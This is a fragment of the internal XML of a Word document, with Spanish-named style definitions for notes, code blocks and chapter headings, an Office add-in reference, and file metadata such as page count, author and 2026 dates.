    <w:link w:val="Textoindependienteprimerasangra2Car"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>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771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textomacro">
    <w:name w:val="macro"/>
    <w:link w:val="TextomacroCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771E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A771ED"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textonotaalfinal">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextonotaalfinalCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextonotaalfinalCar">
    <w:name w:val="Texto nota al final Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Textonotaalfinal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textonotapie">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextonotapieCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextonotapieCar">
    <w:name w:val="Texto nota pie Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Textonotapie"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textosinformato">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextosinformatoCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>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771ED"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulodendice">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="ndice1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulodellibro">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TtuloTDC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Ttulo1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:between w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="VariableHTML">
    <w:name w:val="HTML Variable"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Bloquedecdigo">
    <w:name w:val="Bloque de código"/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:keepLines/>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:left="238" w:right="238"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Cdigoenlnea">
    <w:name w:val="Código en línea"/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Epgrafe">
    <w:name w:val="Epígrafe"/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="280"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Ttulodelcaptulo">
    <w:name w:val="Título del capítulo"/>
    <w:rsid w:val="006242F5"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:b/>
      <w:color w:val="1F4E79"/>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Subttulodeunidad">
    <w:name w:val="Subtítulo de unidad"/>
    <w:rsid w:val="006242F5"/>
    <w:pPr>
      <w:spacing w:after="280"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Cuerpo">
    <w:name w:val="Cuerpo"/>
    <w:rsid w:val="006242F5"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="276" w:lineRule="atLeast"/>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9DFDD2-F583-4625-9F57-17D77A403526}">
  <we:reference id="wa200010453" version="1.0.0.1" store="en-US" storeType="OMEX"/>
  <we:alternateReferences>
    <we:reference id="wa200010453" version="1.0.0.1" store="" storeType="OMEX"/>
  </we:alternateReferences>
  <we:properties>
    <we:property name="claude.fileId" value="&quot;c2aacaf5-63f9-4549-b69d-13e9605e8b9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TotalTime>
  <Pages>25</Pages>
  <Words>8645</Words>
  <Characters>43261</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1117</Lines>
  <Paragraphs>708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 torres</dc:creator>
  <cp:lastModifiedBy>matias torres</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <cp:lastPrinted>2026-09-01T02:03:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-01T01:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-03T12:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>